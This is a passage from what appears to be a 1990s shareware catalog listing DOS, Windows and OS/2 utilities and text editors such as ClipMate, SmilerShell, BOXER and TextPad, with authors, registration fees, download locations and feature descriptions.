2.10.1 For multiple programs + + Product: HDM - Hard Disk Menu + DOS menu & security system, network support. See full + description on page 151. + + Product: RI-VB Database Toolkit v1.1 + Utility to develop VB and Access apps. See full description on + page 416. + + Product: SensuVoX I + Author: Unicorn Software Limited (Charles P. Schell IV), + 816-429-3558 + Version: 0.00 (01-29-95) + Needs: IBM 80386, Windows 3.1 or better. sound card. Program + capable of playing WAVs. + Registration fee: $29.95 (add $4.00 for shipping to U.S. + addresses) (add $4.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); + lifetime unlimited phone, fax, BBS, CompuServe, newsletter, + mail support; bonus data; all ASP-wide offers (see page 6); + + Chapter 2, "Utilities" 166 + + + + disks of other shareware; discounts on other products. + Lifetime free upgrading allowed. + Look for: SVOXI.ZIP on BBSs (call 317-784-2147 to download it at + no charge); SVOXI.ZIP on CompuServe in CIS:WINFUN forum LIBrary + 5 (or contact userID 70272,3317 for assistance). + SWREG#: 4508 + Download size: 600k (about 45 minutes with a 2400 baud modem) + Description: + SensuVoX I is a collection of over 500 WAV files from 5 + different vocalists designed to work with speech programs + within Windows. It allows you to give your PC a "Sensual + Voice". The project has over 100 standard Window's commands, + Solitaire commands, talking clock, and "TastyBits" + (miscellaneous and provocative comments) from each of the + vocalists. This set features four female (Ciara, Oceania, + Linda & Sheree) and one male (Pete) vocalist. All WAVs are in + English in this set. + + + 2.10.2 For operating systems + + See also: Utilities, System utilities, Operating systems; + Utilities, System utilities, Multi-OS utilities. + + 2.10.2.1 MS-DOS + + See also: Utilities, Software tools & add-ins, For JP Software, + For 4DOS/NDOS. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 33. + + 2.10.2.2 Windows + + Product: ACTION Process Automator + Triggers predetermined actions in Windows. See full + description on page 94. + + Product: AMF Daily Planner & P.I.M. + Hot! The best & easiest PIM for Windows. See full description + on page 113. + + Product: AMF Intelligent Organ for Win + Organ for Windows - play it with your mouse! See full + description on page 550. + + Chapter 2, "Utilities" 167 + + + + Product: AMF Multimedia Jukebox (WIN) + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. sound card; + VBRUN300.DLL. Video Extensions (for Video). + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: JBOX.ZIP on BBSs; JBOX.ZIP on CompuServe in CIS:WUGNET + forum LIBrary 4 (or contact userID 74250,1700 for assistance). + SWREG#: 3386 + Download size: 105k (about eight minutes with a 2400 baud modem) + Description: + Now you can play any Multimedia file that you have drivers/ + extenions for as many times as you want. Queue as many + selections as you would like, save the lists, and with one + click have your pre-programmed list playing. Will play AVI, + MOV, WAV, VOC, FLI, FLIC, MIDI, etc. Can act as just a simple + multimedia player as well. Has a beautiful 3D interface. Easy + to use. Full help included. + + + Product: Button Manager for Windows + Icon-driven Windows application launcher. See full description + on page 159. + + Product: CD Wizzard CD Player for Win + CD Wizzard CD Player for Windows 95 and WinNT. See full + description on page 73. + + Product: ClipMate for Windows + Author: Thornton Software Solutions, 716-227-6505 + Version: 3.13 (09-01-95) + Needs: IBM AT (80286), Windows 3.1 or better. 4096k RAM; VGA + monitor; Hard disk; Mouse. + Registration fee: $25.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; 3-month return policy; bonus utilities; disks of + other shareware; discounts on upgrades. 1-month free upgrading + allowed. + Look for: CLIPMT31.ZIP on BBSs; CLIPMT31.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 6 (or contact userID 70743,2546 for + assistance). + SWREG#: 173 + Download size: 250k (about 19 minutes with a 2400 baud modem) + Description: + Remembers all items that you copy to the Windows Clipboard. + Lets you view, edit, combine, and print clipboard data. Support + for most clipboard formats, including BMP, Picture, RTF, OLE, + and More! Exclusive PowerPaste(tm) provides rapid pasting into + + Chapter 2, "Utilities" 168 + + + + applications. New features: Auto-Save, Compatible with Windows + 95. + "ClipMate turns the Windows Clipboard from an + underpowered utility into a true power tool." - PC + Computing + + + Product: CommEx + Author: Cottonwood Software, 913-663-3022 + Version: 1.27 (04-03-96) + Needs: IBM AT (80286), Windows 3.1 or better. Hard disk. + Strongly recommended: VGA monitor. + Registration fee: $15.00 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; 1-month limited return policy; all + ASP-wide offers (see page 6); discounts on other products; + discounts on upgrades. 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + PsL#: 14153 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Common dialog extensions for Windows 3.1/3.11. Adds file + management functions like Find, Copy, Delete, Rename, and + MakeDir to the Open and Save dialogs of most Windows + applications. No more jumping back and forth between your + application and File Manager or DOS to do common functions! + Search every disk drive at once for files (multiple masks, + too!) Make a new directory as you save files, delete old + versions, make backups before you open a file, etc. - all from + the Open/Save dialog! + + + Product: Elbow Grease for Windows + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. VBRUN300.DLL. + Registration fee: $19.95 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: ELBOW.ZIP on BBSs; ELBOW.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3048 + Download size: 325k (about 24 minutes with a 2400 baud modem) + Description: + This little program sits on the bottom of your screen in only + 1.5 inches. Has a "double toolbar" which allows up to 40 + programs to be launched with one click. Full-sized icons and + user-specified ToolTips. Has a to-do List, and perpetual + calendar to the year 9000. Has drag & drop File Manager + + Chapter 2, "Utilities" 169 + + + + launching, games like Tic Tac Toe, and a whole slew of other + utiltites. Easy to use and operate, Full help included. + + + Product: File-Ex + Author: Cottonwood Software, 913-663-3022 + Version: 1.04 (04-25-96) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: $24.95 (add $2.00 for shipping to U.S. + addresses) (add $2.00 for shipping to Canadian addresses) (add + $4.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, mail + support; 1-month return policy; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + 12-month free upgrading allowed. + Look for: availability unknown on BBSs. + PsL#: 14533 + Download size: 315k (about 24 minutes with a 2400 baud modem) + Description: + File dialog extensions. Make Win3.x file dialogs what they + should be! For Windows 3.1/3.11. Adds file Find, Copy, Delete, + Rename, Move and MakeDir functions to most Windows + applications' Open and Save dialogs, plus easily access the + last 25 files and directories used. (Also adds 3-D look.) Fully + functional. + + + Product: GARDENING BUSINESS + Software for managing small gardening bus. See full + description on page 303. + + Product: ModemSta + Iconic status indicator for Windows. See full description on + page 376. + + Product: Money Organizer + Manages unlimited number of accounts, budget. See full + description on page 334. + + Chapter 2, "Utilities" 170 + + + + Product: Mouse Clock (tm) for Windows + Author: AMF (Andrew M. Freeman) + Version: 2.0 (06-01-96) + Needs: IBM AT (80286), Windows 3.1 or better. Mouse. + Registration fee: $10.00 + Registration benefits: Full program functionality; 6 months of + unlimited CompuServe, mail support; all ASP-wide offers (see + page 6). 1-month free upgrading allowed. + Look for: MCLOCK.ZIP on BBSs; MCLOCK.ZIP on CompuServe in + CIS:WINSHA forum LIBrary 5 (or contact userID 74250,1700 for + assistance). + SWREG#: 3250 + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + Virtually becomes part of the cursor. It displays the current + time in US or 24-hr versions, seconds, free system resources, + and if the rate clock is active, the current total. Totally + configurable. Easy to use. Beneficial utility for WinCIM users! + It's smart, you can tell it when to stay out of the way, or + have it always on top. Never interferes with your mouse + operations. Great little utility! + + + Product: Papers + Author: clySmic Software + Version: 1.00 (12-01-93) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $10.00 + Registration benefits: 3 months of unlimited mail support; all + ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; PAPERS.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 0 (or contact userID 76156,164 + for assistance). + Download size: 89k (about seven minutes with a 2400 baud modem) + Description: + Utils that ease using Windows wallpaper. Common dialog loader + w/history, drag 'n' drop icon loader, and a File Manager + Extension (includes other functions: ejecting CD-ROMs, viewing + files, exiting, restarting, rebooting Windows). Also network + wallpaper support. + + + Product: Playground + Tool for building object models. See full description on + page 386. + + Product: Rosenthal UnInstall + Remove unwanted DOS & Windows prog. safely. See full + description on page 33. + + Product: Rosenthal WinLite + Shrink MS-Windows programs by compression. See full + description on page 38. + + Chapter 2, "Utilities" 171 + + + + Product: SAB Diskette Utility + Format/copy/convert/save diskette images. See full description + on page 22. + + Product: Screen Saver Sampler + Windows screen saver with password protection. See full + description on page 66. + + Product: SmilerShell + Author: Bardon Data Systems, 510-526-8470 + Version: 3.0 (03-29-95) + Needs: IBM AT (80286), Windows 3.1 or better. + Registration fee: $29.95 (add $3.50 for shipping to U.S. + addresses) (add $3.50 for shipping to Canadian addresses) (add + $9.50 for shipping outside U.S. or Canada) + Registration benefits: printed manual; 31/2" master disk(s); + lifetime unlimited phone, CompuServe, mail support; bonus + utilities; all ASP-wide offers (see page 6); disks of other + shareware; discounts on other products; discounts on upgrades. + Look for: availability unknown on BBSs; SMISHL.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 9 (or contact userID 72340,375 + for assistance). + SWREG#: 1186 + Download size: 100k (about eight minutes with a 2400 baud modem) + Awards & nominations: 1994 finalist, Shareware Industry Awards. + Description: + This Windows control center & cmdline takes NO screen space! + Right-click on roving titlebar button to launch from your + favorite-apps list, or switch to running app. Left-click pops + up ultimate Win cmdline: runs DOS & WIN pgms, pipes/redir; + hist/edit/srch; aliases (type-in or Fn key); fast dir change + over multiple drives; find files by name or contents; cal/ + clock, curr dir, Win mem/rsrcs, more! "Best Util 1994" finalist + (SIA) "Must-have, recommended" (Windows Mag) "Brilliant" (PC + Plus) + + + Product: Technical Editor (Windows NT) + Programmers/text editor. See full description on page 180. + + Product: WDiff + Windows file/directory/ZIP difference viewer. See full + description on page 44. + + Product: wfListen + Mediates between comms program & WinFax. See full description + on page 357. + + Product: wfStatus + Changes WinFax icon to show receive status. See full + description on page 358. + + Chapter 2, "Utilities" 172 + + + + Product: Win Change + Globally find and change text in files. See full description + on page 53. + + Product: Win Multiple Configurations + Allows 100 different Windows configurations. See full + description on page 104. + + Product: WinAlter + Alter file date, time, & attribs in Windows. See full + description on page 28. + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 41. + + 2.10.2.3 OS/2 + + Product: RexxBase + The dBase Database For Rexx. See full description on page 387. + + 2.10.3 For JP Software + + See also: Utilities, Software tools & add-ins, For Norton. + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + ZIP front end - automates 4DOS file descripts. See full + description on page 173. + + Product: ZIP Fugue (Windows) + ZIP handler - automates 4DOS file descripts. See full + description on page 173. + + 2.10.3.1 For 4DOS/NDOS + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 24. + + 2.10.4 For Norton + + See also: Utilities, Software tools & add-ins, For JP Software. + + 2.10.4.1 For Norton Utilities + + Product: 4FILES + File manager, annotator and program launcher. See full + description on page 24. + + Chapter 2, "Utilities" 173 + + + + 2.10.5 For PKWARE + + 2.10.5.1 For PKZIP/PKUNZIP + + Product: ExamineZip + Text retrieval program for ZIP archives. See full description + on page 14. + + Product: File_Handle Filer/Finder/Shell + Integrated DOS stereo file & program manager. See full + description on page 154. + + Product: QFiler + Simple, powerful with 2 side-by-side windows. See full + description on page 156. + + Product: ZIP Fugue (DOS) for PKZIP/UNZIP + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 1.22 (05-21-94) + Needs: IBM PC, DOS 3.3 or better. 256k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $20.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6). + Look for: availability unknown on BBSs; ZIPD12.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 65k (about five minutes with a 2400 baud modem) + Description: + (ZIPD12) & Windows (ZIPW20) & 4DOS descripts. Allows you to tag + files to add to a ZIP file in full screen mode, and then add + them along with their 4Dos file descriptions. It also displays + the files in the ZIP file along with their descriptions. You + can also tag the files in ZIP file, and extract them along with + their 4DOS file descriptions. + + Chapter 2, "Utilities" 174 + + + + Product: ZIP Fugue (Windows) + Author: Fugue Software (David Noakes), +61-7-3824-2843 + Version: 2.0.7 (11-07-95) + Needs: IBM AT (80286), Windows 3.0 or better. EGA monitor; Hard + disk; Mouse. + Strongly recommended: VGA monitor. + Registration fee: $35.00 (add $8.00 for shipping to U.S. + addresses) (add $8.00 for shipping to Canadian addresses) (add + $12.00 for shipping outside U.S. or Canada) + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 3 months of unlimited phone, fax, CompuServe, + mail support; bonus utilities; all ASP-wide offers (see + page 6); disks of other shareware; discounts on other products. + Look for: availability unknown on BBSs; ZIPW20.ZIP on CompuServe + in CIS:PCVENB forum LIBrary 10 (or contact userID 100036,311 + for assistance). + Download size: 360k (about 27 minutes with a 2400 baud modem) + Description: + (ZIPD12) & Windows (ZIPW20) & 4DOS descripts. Allows you to tag + files to add to a ZIP file in full screen mode, and then add + them along with their 4Dos file descriptions. It also displays + the files in the ZIP file along with their descriptions. You + can also tag the files in ZIP file, and extract them along with + their 4DOS file descriptions. + + + Product: Zip Server(TM) + PKZIP 2.04g compatible Windows utility. See full description + on page 41. + + Product: ZiPaper + Wallpaper changer uses PKZip to save space. See full + description on page 41. + + Chapter 3, "Writing applications" 175 + + + + + + Chapter 3 + Writing applications + + See also: Utilities, File utilities, File viewers; Education, + Writing. + + + 3.1 Text viewers/readers + + Product: DEXTER Text Editor + Premium quality multi-file text editor. See full description + on page 177. + + Product: MultiVu + Find/view/extract text, browse archive files. See full + description on page 49. + + Product: QRead + Read any text file w/ font sizing in Win 3.1. See full + description on page 50. + + Product: QRead for Windows 95 + Read any text file w/ font sizing. See full description on + page 50. + + + 3.2 Text editors + + See also: Writing applications, Word processors. + + Product: Bingo Text Editor + Author: Sunderland Software, 410-379-9019 + Version: 4.00a (10-26-94) + Needs: IBM PC, DOS 3.0 or better. 320k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk. + Registration fee: $75.00 (add $15.00 for shipping to Canadian + addresses) (add $15.00 for shipping outside U.S. or Canada) + Registration benefits: choice of 31/2" or 51/4" master disk(s); 3 + months of unlimited phone, CompuServe, mail support; all ASP- + wide offers (see page 6). + Look for: availability unknown on BBSs; BE400A.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 1 (or contact userID 70541,3614 for + assistance). + Download size: 320k (about 24 minutes with a 2400 baud modem) + Description: + A complete text editing system featuring virtual memory for + files far larger than memory, multi level undo, the Chess + extension lanaguage, customizable Syntax Highlighting, and + user-definable menus. Supprts multiple files, multiple menus, + mouse, keyboard definition, and more. + + Chapter 3, "Writing applications" 176 + + + + Product: BOXER/DOS Text Editor + Author: Boxer Software (David R. Hamel), 603-924-6602 + Version: 7.0b (05-01-96) + Needs: IBM AT (80286), DOS 3.0 or better. 384k RAM; CGA monitor; + Dual 720k floppy drives. + Strongly recommended: Hard disk. + Registration fee: $50.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); disks of other shareware; discounts + on other products; discounts on upgrades. 1-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: BOXER*.ZIP on BBSs; BOXER.ZIP on CompuServe in + CIS:PCVENI forum LIBrary 3 (or contact userID 74777,170 for + assistance); BOXER*.ZIP on GEnie in IBMPC forum LIBrary 3 (or + contact userID USE INTERNET for assistance). + SWREG#: 10598 + Download size: 412k (about 31 minutes with a 2400 baud modem) + Description: + A powerful but courteous text editor which is packed with + features: color syntax highlighting, multi-level undo and redo, + full mouse support, multiple files/windows, macros, graphic + drawing, column marking, compile from editor, word processing, + and context sensitive help. Search & replace with wildcards; + globally, selectively or across all edited files. + Reconfigurable keyboard with popular maps supplied; pull-down + menus & online help change dynamically to reflect reassignment. + Much more! + + + Product: BOXER/OS2 Text Editor + Author: Boxer Software (David R. Hamel), 603-924-6602 + Version: 7.0b (05-01-96) + Needs: IBM 80386, OS/2 2.0 or better. Hard disk. + Registration fee: $89.00 (add $6.00 for shipping to U.S. + addresses) (add $6.00 for shipping to Canadian addresses) (add + $8.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; printed + manual; quick-reference card; 31/2" master disk(s); lifetime + unlimited phone, fax, CompuServe, newsletter, mail support; + 1-month return policy; bonus utilities; bonus data; all ASP- + wide offers (see page 6); disks of other shareware; discounts + + Chapter 3, "Writing applications" 177 + + + + on other products; discounts on upgrades. 1-month free + upgrading allowed. 1 free update disk(s) sent out. + Look for: BOXOS2*.ZIP on BBSs; BOXOS2.ZIP on CompuServe in + CIS:PCVENI forum LIBrary 3 (or contact userID 74777,170 for + assistance); BOXOS2*.ZIP on GEnie in OS2 forum LIBrary 11 (or + contact userID USE INTERNET for assistance). + SWREG#: 10600 + Download size: 492k (about 37 minutes with a 2400 baud modem) + Description: + A powerful but courteous editor which is packed with features: + color syntax highlighting, multi-level undo and redo, full + mouse support, macros, graphic drawing, column marking, compile + from editor, word processing, and context sensitive help. This + 32-bit charcter mode program supports HPFS filenames and makes + full use of OS/2's virtual memory to edit very large files. + Fully reconfigurable keyboard: pull-down menus & online help + change dynamically to reflect reassignment. Much more! + + + Product: CMFiler + File manager for DOS. See full description on page 153. + + Product: CODE-A-LINE + Outline processor, text editor, printing util. See full + description on page 182. + + Product: DEXTER Text Editor + Author: FAGERLUND CONSULTING, 604-984-7330 + Version: 2.00 (01-16-95) + Needs: IBM PC, DOS 2.0 or better. 180k RAM. + Registration fee: $44.00 + Registration benefits: printed manual; choice of 31/2" or 51/4" + master disk(s); 12 months of unlimited phone, CompuServe, mail + support; 3-month return policy; bonus utilities. 3-month free + upgrading allowed. + Look for: DEXTER.ZIP on BBSs; DEXTER.ZIP on CompuServe in + CIS:PCAPP forum LIBrary 1 (or contact userID 70253,1046 for + assistance). + Download size: 110k (about eight minutes with a 2400 baud modem) + Description: + DEXTER is a PREMIUM QUALITY, super fast, full featured, multi- + file text editor which is compact and EASY to use. Has + interactive multi-file search & replace, NO FILE SIZE LIMIT, + split and/or boxed windows, context sensitive help, on-line + local & global configuration, keyboard reconfig, wonderful + customizable menus, TEMPORARY QUIT, word processing, line + drawing, column blocks, macros, multiple printers, ASCII table, + 43/50 line mode, colour or b/w. Don't let the size fool you, + this one's loaded. + + Chapter 3, "Writing applications" 178 + + + + Product: EDITEUR + Author: Jean-Pierre Menicucci, +33-9959-1228 + Version: V2.3.1 (02-01-96) + Needs: Unknown. 300k RAM; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $24.00 + Registration benefits: 31/2" master disk(s); lifetime unlimited + phone, fax, BBS, CompuServe, mail support. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; EDIT95.ZIP on CompuServe + in CIS:PCAPP forum LIBrary 1 (or contact userID 73261,2701 for + assistance). + SWREG#: 1737 + Download size: 220k (about 17 minutes with a 2400 baud modem) + Description: + Text editor. Fast and compact, easy to use, good looking. + Handles Windows, Dos, and Unix text files. Multitext, unlimited + file size (good at handling large files). Lots of features. + + + Product: MEGA EDIT Editor for Windows + Author: COMPUTER WITCHCRAFT, INC., 502-589-6800 + Version: 2.11 (03-24-94) + Needs: IBM AT (80286), Windows 3.0 or better. 125k RAM; EGA + monitor; Hard disk. + Strongly recommended: VGA monitor; Mouse. + Registration fee: $35.50 (add $3.50 for shipping to U.S. + addresses) (add $5.00 for shipping to Canadian addresses) (add + $9.00 for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; choice of 31/2" + or 51/4" master disk(s); lifetime unlimited phone, fax, + CompuServe, mail support; lifetime return policy; all ASP-wide + offers (see page 6); disks of other shareware. Lifetime free + upgrading allowed. + Look for: availability unknown on BBSs; MEGAED.ZIP on CompuServe + in CIS:WINSHARE forum LIBrary 2 (or contact userID 76130,1463 + for assistance). + Download size: 140k (about eleven minutes with a 2400 baud modem) + Description: + A Windows application that allows editing of very large text + files. Named "WinAp of the Month" by Compute! magazine and + included in PC World's "Best programs for under $50." Has + split screen for up to 20 files, variable sizable display + fonts, import/export UNIX & Mac files, word-wrap, formatted + display of binary files, search & replace, fully CUA compliant, + and file size only limited by Windows virtual memory. America + Online "Editors Choice." + + + Product: PostCardMaster + Postcard & mail handling system. See full description on + page 227. + + Chapter 3, "Writing applications" 179 + + + + Product: Power Edit + Network text editor, email, file encryption. See full + description on page 363. + + Product: QENV + Quick envelope addressor & letter writer. See full description + on page 83. + + Product: Ravitz Editor + Author: Ravitz Software Inc. + Version: 1.10b (08-12-93) + Needs: IBM PC, DOS 2.0 or better. 256k RAM. + Registration fee: $0.00 + Registration benefits: + Look for: RAVED.ZIP on BBSs (call 606-268-0577 to download it at + no charge); RAVED.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 1 (or contact userID 70431,32 for assistance). + Download size: 150k (about eleven minutes with a 2400 baud modem) + Description: + A fast, powerful, mid sized text editor. It has integrated + outlining and overviewing, area mark manipulation (copy, fill, + shift, sort, etc.), find/change, word wrap and reflow, line + drawing, multiple file handling, change tracking, flexible user + interface (function keys, mouse, menus), and it is configurable + and programmable. + + + Product: READ + Author: Robert Lindsay Wells, 813-447-0604 + Version: 3.2 (01-17-96) + Needs: IBM PC, DOS 3.0 or better. 512k RAM; Program can run + safely on a system with no hard disk and only one floppy disk + drive; CGA monitor. + Strongly recommended: Hard disk; HP DeskJet printer; HP + LaserJet printer; Postscript printer; Mouse; Epson printer; + math coprocessor. + Registration fee: $12.00 (add $2.00 for shipping outside U.S. or + Canada) + Registration benefits: Full program functionality; printed + manual; choice of 31/2" or 51/4" master disk(s); 3 months of phone, + CompuServe, newsletter, mail support; 3-month limited return + policy. 1 free update disk(s) sent out. + Look for: READ32.ZIP on BBSs; READ.ZIP on CompuServe in CIS:PCAPP + forum LIBrary 1 (or contact userID 102507,3113 for assistance). + SWREG#: 9182 + Download size: 84k (about six minutes with a 2400 baud modem) + Description: + A compact DOS program for reading and editing ASCII text files + of virtually unlimited size. Includes a versatile file + selection menu, word wrap, large text mode, search-and- + replace, cut-and-paste and printer support. Reads huge files by + breaking them into segments. Mouse supported. Has on-line help, + and comes with an ASCII text file describing available + features. + + Chapter 3, "Writing applications" 180 + + + + Product: Technical Editor (DOS) + Author: On-Target Software (Michael Russo), 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, DOS 3.0 or better. 640k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 6). 2-month free upgrading allowed. + Look for: TE280DOS.ZIP on BBSs (call 7147519307 to download it at + no charge); TE280D.ZIP on CompuServe in CIS:PCAPP forum LIBrary + 0. + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast DOS programmers editor. Edits any size file. Multi-screen + and multi-window editing. Undo last 1000 changes. Redefinable + keys. Line and column blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Keystroke macros (can save and load from disk). Edits + binary files. History file: remembers last 20 files edited + including what line and column you were on. + + + Product: Technical Editor (OS/2) + Author: On-Target Software (Michael Russo), 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM 80386, OS/2 2.0 or better. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; 1-month return policy; all ASP- + wide offers (see page 6). 2-month free upgrading allowed. + Look for: TE280OS2.ZIP on BBSs (call 7147519307 to download it at + no charge); TE265*.ZIP on CompuServe in CIS:IBMOS2 forum + LIBrary 0. + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Fast 32 bit OS/2 2.0 programmers editor. Multi-screen and + multi-window editing. UNDO last 1000 changes. Redefinable keys. + Line and rectangular blocking. Interactive configuration. + 25,43,50 line modes. Single small executable contains entire + program. Supports up to 50000 character lines with no line + limit. Keystroke macros (can be saved and loaded from disk). + Edits binary files. History file: Remembers last 20 files + edited with row/column position. + + Chapter 3, "Writing applications" 181 + + + + Product: Technical Editor (Windows NT) + Author: On-Target Software (Michael Russo), 415-474-9973 + Version: 2.80 (08-15-94) + Needs: IBM PC, Windows 3.0 or better. 1000k RAM. + Registration fee: $39.95 + Registration benefits: printed manual; quick-reference card; + choice of 31/2" or 51/4" master disk(s); lifetime unlimited phone, + fax, CompuServe, mail support; all ASP-wide offers (see + page 6). + Look for: TE280NT.ZIP on BBSs (multiple files) (call 7147519307 + to download it at no charge). + Download size: 80k (about six minutes with a 2400 baud modem) + Description: + Full-featured, fast and powerful programmers editor. Edits + files larger than available RAM under DOS. 32 bit versions for + OS/2 and now Windows NT. Multi-Window, keyboard configurable, + undo, and everything else. Selected as personal favorite in + Computer Language Magazine review (June 91). + + + Product: TextPad 16 + Author: Helios Software Solutions + Version: 1.30 (09-02-95) + Needs: IBM 80386, Windows 3.1 or better. + Registration fee: 30.00L- (add 5.00L- for shipping to U.S. + addresses) (add 5.00L- for shipping to Canadian addresses) (add + 5.00L- for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TPAD16.ZIP on CompuServe + in CIS:WINUTIL forum LIBrary 6 (or contact userID 100041,235 + for assistance). + SWREG#: 3938 + PsL#: 11709 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + 1995 Ziff-Davis Shareware Awards Winner. + "Setting new standards... 10/10" - PC Plus, May 95 + "Best editor for Windows that we've ever seen" - + Windows User, Aug 95 + Has "warm start"; OEM to ANSI conversion; group edits on lines + with bookmarks; block fills. Edits files with up to 32,000 + lines; MDI with 2 views per file; 31 edit commands; true drag & + drop editing; full undo/redo; block select; visible bookmarks; + hex views; GREP and File Compare; and much more. + + Chapter 3, "Writing applications" 182 + + + + Product: TextPad 32 + Author: Helios Software Solutions + Version: 1.30 (09-02-95) + Needs: IBM 80386, Windows NT 3.1 or better. + Registration fee: 30.00L- (add 5.00L- for shipping to U.S. + addresses) (add 5.00L- for shipping to Canadian addresses) (add + 5.00L- for shipping outside U.S. or Canada) + Registration benefits: Full program functionality; 31/2" master + disk(s); lifetime unlimited fax, CompuServe, mail support; all + ASP-wide offers (see page 6). Lifetime free upgrading allowed. + Look for: availability unknown on BBSs; TPAD32.ZIP on CompuServe + in CIS:WINUTIL forum LIBrary 9 (or contact userID 100041,235 + for assistance). + SWREG#: 3938 + PsL#: 11709 + Download size: 450k (about 34 minutes with a 2400 baud modem) + Description: + 1995 Ziff-Davis Shareware Awards Winner. + "The best 32-bit text editor I've seen! It's fast, + loaded with features, and beautifully done. Get it!" - + Dr File Finder. + Has "warm start"; OEM to ANSI conversion; group edits on lines + with bookmarks; block fills. No limit to file length; MDI with + 2 views per file; 31 edit commands; true drag & drop editing; + full undo/redo; block select; visible bookmarks; hex views; + GREP and file compare; much more. + + + Product: WebPen + HTML Web Page Editor. See full description on page 409. + + + 3.3 Text organizers/outliners + + Product: CODE-A-LINE + Author: Optimax Corporation, 312-561-6363 + Version: 1.0 (03-22-94) + Needs: IBM AT (80286), Windows 3.1 or better. 128k RAM; Program + can run safely on a system with no hard disk and only one + floppy disk drive; VGA monitor. + Strongly recommended: Hard disk; Mouse. + Registration fee: $15.00 + Registration benefits: lifetime unlimited phone, fax, CompuServe, + mail support; all ASP-wide offers (see page 6); discounts on + other products. + Look for: availability unknown on BBSs; CODE.ZIP on CompuServe in + CIS:WINSHARE forum LIBrary 10 (or contact userID 75020,3617 for + assistance). + Download size: 230k (about 17 minutes with a 2400 baud modem) + Description: + Folding outliner/editor for ASCII text files (e.g. program + source code). Represent structure by indenting lines. Fold and + unfold program elements. Edit and restructure text with + unlimited Undo. Print professionally-looking source code + + Chapter 3, "Writing applications" 183 + + + + listings, complete with page headings and line numbers. + Customizable fonts, colors, etc. Maintain several sets of + customization options, via configuration files, fine-tuned for + different purposes (e.g. editing vs. printing). + + + Product: DeskTop Advisor(R) + Create/browse popup hypertext w/images, sound. See full + description on page 408. + + Product: E-report + Paperless management reports, COLD. See full description on + page 47. + + Product: Ravitz Editor + Text editor/outliner. See full description on page 179. + + Product: WhizNotes + Author: Advanced Supprt Group, Inc. (Sanjay Kanade), + 314-965-5630 + Version: 2.14 (10-23-95) + Needs: IBM 80386, Windows 3.1 or better. If Help 